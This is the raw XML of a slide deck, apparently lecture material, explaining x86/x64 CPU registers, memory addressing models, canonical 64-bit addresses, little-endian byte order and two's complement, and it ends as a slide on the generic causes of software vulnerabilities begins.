            </a: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?L</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6010235" y="2175314"/>
            <a:ext cx="56202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E?X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7091474" y="2566354"/>
            <a:ext cx="430714"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?X</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82211" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>R?X</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6417141" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>AL/AH/AX/EAX/RAX: Accumulator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>BL/BH/BX/EBX/RBX: Base index (for use with arrays)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>CL/CH/CX/ECX/RCX: Counter (for use with loops and strings)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>DL/DH/DX/EDX/RDX: I/O operations </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488429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(Pointer Registers)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?PL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6010235" y="2164460"/>
            <a:ext cx="582211"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R?P</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7091474" y="2566354"/>
            <a:ext cx="431616"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?P</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82211" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>R?P</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474366" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>SP/ESP/RSP: Stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>BP/EBP/RBP: Stack base pointer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674333" y="4407505"/>
            <a:ext cx="5280675" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>The ?PL registers are only available in 64-bit mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1095787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(Index Registers)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?IL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7091474" y="2566354"/>
            <a:ext cx="35091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?I</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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>R?I</a:t>
            </a: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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>R?I</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5286874" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>SI/ESI/RSI: Source index for string operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>DI/EDI/RDI: Destination index for string operations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674333" y="4407505"/>
            <a:ext cx="5280675" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>The ?IL registers are only available in 64-bit mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9473770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(Instruction Pointer)</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7" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6010235" y="2175314"/>
            <a:ext cx="519531"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EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7091474" y="2566354"/>
            <a:ext cx="389850"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IP</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34747" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>RIP</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211135" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>IP/EIP/RIP: Instruction pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2363619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(FLAGS)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7" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5836555" y="2175314"/>
            <a:ext cx="100610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EFLAGS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6896084" y="2566354"/>
            <a:ext cx="87716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FLAGS</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1031051" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>RFLAGS</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00035" y="2594770"/>
            <a:ext cx="1901933" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>CF: Carry flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ZF: Zero flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>SF: Sign flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>OF: Overflow flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1982889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CPU Registers (64-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>General Registers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> ?L</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6010235" y="2175314"/>
            <a:ext cx="44063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?D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7091474" y="2566354"/>
            <a:ext cx="49642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?W</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289487" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>?</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852337" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>R8, R9, R10, R11, R12, R13, R14, R15</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3317981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(Segments)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6097075" y="1795424"/>
            <a:ext cx="44063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?S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4410035" y="178226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2724395"/>
            <a:ext cx="1608659" cy="1754327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>CS: Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>DS: Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>SS: Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ES: Extra data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>FS: Extra data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>GS: Extra data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19252702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7" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Addressing in x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006598" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Users access memory with 32-bit addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Flat memory model: Memory is considered a single, continuous address space from 0 to 2^32 -1 (4GB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Segmented memory model: Memory is a group of independent address spaces called segments, each addressable separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Real-address mode model: Memory model used for compatibility with 8086 CPUs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The memory architecture is paged (4K pages)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761034" y="1314449"/>
            <a:ext cx="3982528" cy="3038055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600199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Addressing in x64 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>64-bit addresses are considered linear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Segments other than FS, GS are ignored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A processor may use less bits for physical memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An address in canonical format has the unused leading bits set to 0 or 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: 64-bit architecture with 48-bit addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bits 63 thought 48 are set to either 1s or 0s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422689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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Beware of the Endianess </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(and of Signed Integers)!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036293" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel uses little endian ordering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x03020100 starting at address 0x00F67B40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	0x00F67B40   00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	0x00F67B41   01     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	0x00F67B42   02     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	0x00F67B43   03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signed integers are expressed in 2’s complement notation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The sign is changed by flipping the bits and adding one, ignoring the overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-1 is 0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-2 is 0xFFFFFFFE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?? is 0xFFFFF826</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Having a calculator handy is a good thing...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282747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Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced because the application is not able to correctly handle unexpected events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected errors/exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected interleaving of events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unfiltered output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
